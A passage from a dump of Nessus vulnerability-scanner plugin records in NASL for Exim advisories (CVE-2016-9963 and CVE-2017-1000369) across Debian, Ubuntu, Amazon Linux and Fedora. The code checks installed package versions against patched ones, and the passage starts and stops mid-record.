'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'exim4-dev', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '14.04', 'pkgname': 'eximon4', 'pkgver': '4.82-3ubuntu2.2'},\n {'osver': '16.04', 'pkgname': 'exim4', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'exim4-base', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'exim4-config', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-heavy', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'exim4-daemon-light', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'exim4-dev', 'pkgver': '4.86.2-2ubuntu2.1'},\n {'osver': '16.04', 'pkgname': 'eximon4', 'pkgver': '4.86.2-2ubuntu2.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'exim4 / exim4-base / exim4-config / exim4-daemon-heavy / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:57:08", "description": "Bjoern Jacke discovered that Exim, Debian's default mail transfer agent, may leak the private DKIM signing key to the log files if specific configuration options are met.", "cvss3": {}, "published": "2016-12-27T00:00:00", "type": "nessus", "title": "Debian DSA-3747-1 : exim4 - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3747.NASL", "href": "https://www.tenable.com/plugins/nessus/96104", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3747. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96104);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"DSA\", value:\"3747\");\n\n script_name(english:\"Debian DSA-3747-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3747\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-2+deb8u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"exim4\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-base\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-config\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dbg\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dev\", reference:\"4.84.2-2+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"eximon4\", reference:\"4.84.2-2+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:43:09", "description": "Bjoern Jacke discovered that Exim, Debian's default mail transfer agent, may leak the private DKIM signing key to the log files if specific configuration options are met.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-27T00:00:00", "type": "nessus", "title": "Debian DLA-762-1 : exim4 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "p-cpe:/a:debian:debian_linux:exim4-base", "p-cpe:/a:debian:debian_linux:exim4-config", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy", "p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg", "p-cpe:/a:debian:debian_linux:exim4-daemon-light", "p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg", "p-cpe:/a:debian:debian_linux:exim4-dbg", "p-cpe:/a:debian:debian_linux:exim4-dev", "p-cpe:/a:debian:debian_linux:eximon4", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-762.NASL", "href": "https://www.tenable.com/plugins/nessus/96097", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-762-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96097);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-9963\");\n\n script_name(english:\"Debian DLA-762-1 : exim4 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Bjoern Jacke discovered that Exim, Debian's default mail transfer\nagent, may leak the private DKIM signing key to the log files if\nspecific configuration options are met.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.80-7+deb7u4.\n\nWe recommend that you upgrade your exim4 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/12/msg00038.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/exim4\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-heavy-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-daemon-light-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eximon4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"exim4\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-base\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-config\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dbg\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"exim4-dev\", reference:\"4.80-7+deb7u4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"eximon4\", reference:\"4.80-7+deb7u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:52:31", "description": "It was found that Exim leaked DKIM signing private keys to the 'mainlog' log file. As a result, an attacker with access to system log files could potentially access these leaked DKIM private keys.", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : exim (ALAS-2017-804)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9963"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:exim", "p-cpe:/a:amazon:linux:exim-debuginfo", "p-cpe:/a:amazon:linux:exim-greylist", "p-cpe:/a:amazon:linux:exim-mon", "p-cpe:/a:amazon:linux:exim-mysql", "p-cpe:/a:amazon:linux:exim-pgsql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2017-804.NASL", "href": "https://www.tenable.com/plugins/nessus/97556", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2017-804.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97556);\n script_version(\"3.2\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-9963\");\n script_xref(name:\"ALAS\", value:\"2017-804\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2017-804)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that Exim leaked DKIM signing private keys to the\n'mainlog' log file. As a result, an attacker with access to system log\nfiles could potentially access these leaked DKIM private keys.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2017-804.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update exim' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"exim-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-debuginfo-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-greylist-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mon-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mysql-4.88-2.11.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-pgsql-4.88-2.11.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / exim-mon / exim-mysql / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:56:37", "description": "The Qualys Research Labs discovered a memory leak in the Exim mail transport agent. This is not a security vulnerability in Exim by itself, but can be used to exploit a vulnerability in stack handling.\nFor the full details, please refer to their advisory published at:\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "nessus", "title": "Debian DSA-3888-1 : exim4 - security update (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-3888.NASL", "href": "https://www.tenable.com/plugins/nessus/100879", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3888. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100879);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-1000369\");\n script_xref(name:\"DSA\", value:\"3888\");\n\n script_name(english:\"Debian DSA-3888-1 : exim4 - security update (Stack Clash)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. This is not a security vulnerability in Exim by\nitself, but can be used to exploit a vulnerability in stack handling.\nFor the full details, please refer to their advisory published at:\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3888\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the exim4 packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 4.84.2-2+deb8u4.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"exim4\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-base\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-config\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dbg\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"exim4-dev\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"eximon4\", reference:\"4.84.2-2+deb8u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-base\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-config\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dbg\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dev\", reference:\"4.89-2+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"eximon4\", reference:\"4.89-2+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:59:02", "description": "This is an update fixing multiple memory leaks and other problems.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-09-01T00:00:00", "type": "nessus", "title": "Fedora 26 : exim (2017-f5177f3a16) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:exim", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-F5177F3A16.NASL", "href": "https://www.tenable.com/plugins/nessus/102902", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-f5177f3a16.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102902);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000369\");\n script_xref(name:\"FEDORA\", value:\"2017-f5177f3a16\");\n\n script_name(english:\"Fedora 26 : exim (2017-f5177f3a16) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is an update fixing multiple memory leaks and other problems.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f5177f3a16\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected exim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/01\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 